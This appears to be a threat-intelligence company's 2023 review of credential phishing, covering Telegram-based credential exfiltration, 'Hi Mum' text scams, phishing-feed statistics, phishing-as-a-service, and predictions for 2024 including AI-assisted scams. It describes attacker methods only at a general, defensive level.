Throughout 2023, The WMC Global threat intelligence team remained steadfast in safeguarding users and clients against the relentless tide of credential phishing threats. As we bid farewell to the year, we reflect on significant events, emerging trends, and observed shifts in threat actor behavior and predict threat landscape highlights for the year ahead.
2023: The Year of Telegram - Among the varied exfiltration methods, Telegram has risen to prominence in the threat actor's playbook. As we delve into the intricacies of phishing in 2023, we'll explore how cybercriminals have exploited Telegram. The blog will unravel the methods used by malicious threat actors on this platform and examine the implications for users.
“Hi Mum” Scams – 2023 witnessed the rise of "Hi Mum" family scams in the UK, a tactic that preys on the emotions of unsuspecting individuals to drive them to a desired action. These scams, masquerading as heartwarming messages from loved ones, aim to deceive recipients into sending money to threat actors. This summary of our investigation will explore the working methods of the scams and detail how WMC Global fought back.
PhishFeed Stat Wrap-Up - No discussion on the state of phishing would be complete without a comprehensive statistical analysis. The blog will provide a detailed wrap-up of the PhishFeed statistics for 2023, highlighting key trends and notable campaign tactics. By dissecting these statistics, readers will gain a deeper understanding of the ever-changing landscape and be well equipped for 2024.
Phishing as a Service (PaaS) - A term that has gained prominence in recent times, "Phishing as a Service" is an offering that waxes and wanes in popularity with threat actors. As threat actors always explore easier and quicker solutions to monetization, PaaS offerings have taken a foothold in the cybercrime marketplace as an efficient and cheap way to run a phishing operation. We'll review the mechanics of these services, examining how they operate, their impact on cybersecurity, and the challenges and advantages they pose to defenders.
2023: The Year of Telegram
Released in 2013, Telegram is not a new service. However, in the past year WMC Global has seen a significant increase in threat actors solely using Telegram bots at scale as a phishing kit exfiltration method. Last year became the pivotal point where all new observed kits employed Telegram, forgoing other methods. Notably, some Phishing as a Service offerings now allow threat actors to select Telegram as a victim notification method as they are adapting to their customers’ needs.
Alongside the growth of Telegram, WMC Global witnessed the growth in abuse of legitimate services. Services like Google’s WebApp, Firebase, and Heroku have been used to host phishing by threat actors for many years, but because these platforms do not allow PHP processing to occur, threat actors are required to use JavaScript exfiltration methods. The main exfiltration method is using JavaScript to POST credentials to Telegram directly from these services. Another method is using compromised sites to host a PHP page. The threat actor then makes a POST to this PHP script which can execute and exfiltrate the details in a more traditional way. Often, this exfiltration still routes to Telegram.
“Hi Mum” Scams
The “Hi Mum” family scams seen first in the UK are a simple evolution on the more traditional romance-based campaigns. In these scams, threat actors attempt to gain trust and push urgency by impersonating a person's child in need of help. WMC Global has seen no advanced tactics employed in these phishing campaigns and threat actors are sending mass text messages to incremental numbers, unaware of who they are messaging; No spear phishing or targeting appears to be conducted. Threat actors are simply hoping the recipient is a parent and that they do not question the threat actor as to their authenticity as the recipient’s child.
Last year these scams moved globally and additionally appeared in mainland Europe, the US, and Australia. We suspect the vast majority of these phishing campaigns are run by sole threat actors who purchase spam lists and use SIM boxes or online Communications Platform as a Service (CPaaS) services to mass text users. Most then move onto WhatsApp to continue engaging with potential victims. They test the potential victim initially by encouraging them to pay a small amount of money for a manufactured scenario like helping them fix their phone or repay a debt. If the requested money is paid, then the threat actor will continue to hound the victim to send further funds.
The WMC Global threat intelligence team engaged in an initiative with law enforcement to help disrupt these scammers which resulted in multiple arrests. This is an ideal outcome and demonstrates no platform or technique is guaranteed safe or foolproof for threat actors.
Phishfeed Wrap-Up:
PhishFeed is WMC Global’s proprietary phishing feed. With millions of ingested URLs, PhishFeed is a source of unique, valuable and useful IoCs which brands and organizations use to detect, block, and investigate phishing campaigns targeting their companies.
Mobile Phishing Data
Figure 1: Percentage of mobile vs. non-mobile phishing campaigns
Mobile phishing campaign data is WMC Global’s specialty and a sizeable part of WMC Global’s overall intelligence data, uniquely positioning us to provide dedicated expertise and valued insight into SMS phishing campaigns through PhishFeed.
As with any intelligence feed, WMC Global’s visibility is unique and based upon our own proprietary ingested data. Figure 1, above, illustrates a rich feed of mobile phishing, proving mobile campaigns are not slowing down and harbor a large threat to organizations. With an understanding of a company’s collection methodologies, organizations can use multiple feeds from different viewpoints to give a better overall view of the threat landscape.
Over 66% of PhishFeed's collected data for 2023 was linked to mobile campaigns, emphasizing how WMC Global’s data visibility is weighted towards this. The WMC Global threat intelligence team asserts this measurement is not a representation of the percentage of phishing campaigns which are operated over SMS but is more a reflection on WMC Global’s data bias.
Figure 2: Brands commonly targeted with phishing attacks
WMC Global identifies and brands all phishing URLs ingested into PhishFeed. Branding the URLs allows the threat intelligence team to classify phishing campaign trends across various sectors, as well as track campaign volumes over time. Figure 2 illustrates which brands have been impacted by the largest campaigns and which brands have been most consistently targeted, with the United States Postal Service (USPS) being particularly hard hit.
Figure 3: Web hosting services popular with threat actors
A constant battle for threat actors is where to host their phishing campaigns. If a scammer uses a dedicated domain, they need to find one that is for sale, within budget, and with a name that relates to the campaign they plan to run. If the threat actor uses a compromised host, they either need to buy this access or compromise the host themselves. Not only does this process take time, but threat actors may lose access if the server or site is updated. Threat actors can also use user-content hosting services. While these sites may avoid the previously noted challenges, most of these offerings do not offer PHP processing, forcing threat actors to find other ways to exfiltrate data. WMC Global witnessed multiple websites routinely used to host phishing. As shown in Figure 3 above, threat actors spread out their landing pages across different web hosting services with many websites seeming equally popular.
Phishing as a Service
Phishing as a Service (PaaS) is not new, but throughout 2023 WMC Global observed a large shift from threat actors running live puppeteer kits (a major trend in previous years) to relying on these service offerings to either perform automated analysis or use the site as the admin panel. Puppeteer kits had a major issue with their being detected because all phishing sites need to be centrally connected to an admin panel on the same host. As a result, if the site goes down, the controlling threat actor would lose any harvested credentials. In contrast, if a site is taken down while using a third-party service, not only can the threat actor spin up another site, but these services allow for a single login to the admin panel for control over multiple phishing domains and campaigns, depending on the sophistication of the PaaS.
PaaS might seem like the silver bullet for threat actors, however they come with one major downfall. All the phishing kits that a PaaS provider offers are usually built by the same threat actor, greatly simplifying detection because all resources are the same. These services like to have the largest collection of sites possible and frequently that means kits are created in rapid succession, resulting in few alterations and almost no defenses built in to identify or prevent detection. PaaS offerings create a single point of failure and law enforcement has dedicated more time into targeting and taking down these operations. This single point of failure opens opportunities for law enforcement to disrupt multiple phishing campaigns and target both the PaaS operators and the operators of the phishing sites. These operators can be more easily targeted because PaaS services gather information, making it easy to identify service users.
Predictions for 2024
Seeing into the future is always difficult; however, with WMC’s unique insights into SMS data and specialism in credential phishing, it allows us to be in a good place to make some well researched and strong predictions for the next 12 months of threat actor activity.
Large-Scale Is Better Than Small-Scale
Throughout the last few years there has been a noticeable decrease in large-scale SIM box type campaigns. The main campaigns the threat intelligence team witnessed were smaller concentrated operations targeting local entities unique to a specific geographic region. However, recently WMC Global has seen evidence that threat actors are moving back to indirect targeting, or mass smishing, a mobile phishing method where a threat actor sends a large amount of SMS messages to millions of phones using a generic or larger organization as the lure. This shift could be a result of changing tactics to ensure media coverage of attack campaigns and trends are not always aligned with the true threat picture to ensure a higher yield from victims, or it might be a changing threat actor landscape with new threat actors wanting to try different tactics, unaware they are just replicating the same tactics, techniques, and procedures (TTPs) which were observed a couple of years prior.
More Indirect Targeting
As more banks and institutions implement more advanced fraud detection capabilities, WMC Global predicts threat actors will move away at mass from direct targeting of bank accounts and shift into more sophisticated social engineering tactics. We have seen evidence of these campaigns, but WMC Global threat analysts believe this will only increase throughout the year to bypass the fraud detection in place. Banks are making it harder for threat actors to gain unauthorized access to a victim's account without being detected. Threat actors believe being able to socially engineer a victim to transfer their own funds allows them to evade detection more easily and once they have control of the money, they can then move it into other accounts, across borders and cash out in numerous ways.
Targeting middle parties like supply chains, which might lack the threat detection, URL blocking, and mitigation resources to protect against on-going and large-scale phishing campaigns, could allow more victims to fall for the sites. Additionally, brands have a much lower incentive to invest in shutting down phishing sites if they are not personally losing money from a phishing campaign that is using their brand as a lure. Package delivery companies are being used as phishing lures, but the companies don’t personally lose money from the effect of the phishing campaign. As a result, there is a much lower incentive to shut down the sites. Meanwhile, banks who incur financial loss cannot police the whole internet and act against all phishing sites.
Is AI the Future?
In the last quarter of 2023, AI became more accessible to the general public and the level of sophistication, public awareness, and governmental scrutiny of AI increased tenfold. WMC Global has seen many companies stating that AI poses a threat to security and how the use of AI will benefit threat actors in the delivery and setup of their campaigns. WMC Global threat analysts believe threat actors will optimize their campaign configurations by using AI to generate phishing lure emails and text messages, eliminating misspellings and inconsistent language that have been easy tells in the past. However, this doesn’t pose a huge risk to users as threat actors have varying levels of language fluency and many campaigns sent without AI are written in the perfect vernacular. . AI will play a part in assisting threat actors; however, it is almost impossible for threat intel companies to say with any level of confidence whether AI was used in a campaign. On the other hand, the WMC Global threat intelligence team believes that threat actors will look to employ AI to automate more of their campaign workflows. We believe we might start seeing automated campaigns using AI to deliver live chat or adaptable pages using AI to change based upon a user's input. This could be detected, as code usage might harness AI API systems to feed data into a data model and then, using the reply from the AI, make changes or adaptations to a phishing site.
AI will continue to be a focal point for all levels of organizations, from governments ensuring development is safe and controlled, companies looking to use AI to enhance their security posture and detection capabilities, and threat actors trying to use it to enrich their campaigns to gather more victims and increase their monetary gains.
Looking Ahead
The exponential advancements in technology, and especially AI, suggest threat actor methodologies will become increasingly challenging to combat in 2024 and beyond. Threat intelligence teams must stay alert to trends, creative with their approaches to detection, and proactive towards any unusual patterns they discover to stay ahead of scammers in a volatile environment. While future market needs evolve, WMC Global remains at the ready, monitoring the environment for any fluctuations and adapting to best protect users and clients alike.